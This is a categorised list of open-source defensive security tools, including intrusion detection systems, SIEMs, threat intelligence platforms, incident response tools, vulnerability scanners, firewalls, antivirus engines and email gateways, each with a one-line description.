Security monitoring, intrusion detection/prevention
- Suricata – intrusion detection system
- Snort – intrusion detection system
- Zeek – network security monitoring
- OSSEC – host-based intrusion detection system
- Wazuh – a more active fork of OSSEC
- Velociraptor – endpoint visibility and response
- OSSIM – open source SIEM, at the core of AlienVault
- SecurityOnion – security monitoring and log management
- Elastic SIEM – SIEM functionality by Elasticsearch
- Mozdef – SIEM-like layer ontop of Elasticsearch
- Sagan – log analytics and correlation
- Apache Metron – (retired) network security monitoring, evolved from Cisco OpenSOC
- Arkime – packet capture and search tool (formerly Moloch)
- PRADAS – real-time asset detection
- BloodHound – ActiveDirectory relationship detection
Threat intelligence
- MISP – threat intelligence platform
- SpiderFoot – threat intelligence aggregation
- OpenCTI – threat intelligence platform
- OpenDXL – open source tools for security intelligence sharing
- Sigma – Generic Signature Format for SIEM Systems
Incident response
- StackStorm – SOAR platform
- CimSweep – Windows incident response
- GRR – incident response and remote live forensics
- TheHive – incident response / SOAR platform
- TheHive Cortex – TheHive companion used for fast queriying
- Shuffle – open source SOAR platform
- osquery – real-time querying of endpoint data
- Kansa – PowerShell incident response
Vulnerability assessment
- OpenVAS – very popular vulnerability assessment
- ZAProxy – web vulnerability scanner by OWASP
- WebScarab – (obsolete) web vulnerability scanner by OWASP
- w3af – web vulnerability scanner
- Loki – IoC scanner
- CVE Search – set of tools for search in CVE data
Firewall
- pfsense – the most popular open source firewall
- OPNSense – hardened BSD-based firewall
- Smoothwall – Linux-based Firewall
Antivirus / endpoint protection
- ClamAV – open source antivirus angine
- Armadito AV – open source AV (retired)
- YARA – The pattern matching swiss knife for malware researchers
Email security
- Hermes Secure Email Gateway – an Ubuntu-based email gateway
- Proxmox – email gateway
- MailScanner – email security system
- SpamAssassin – anti-spam platform
- OrangeAssassin – drop-in replacement of SpamAssassin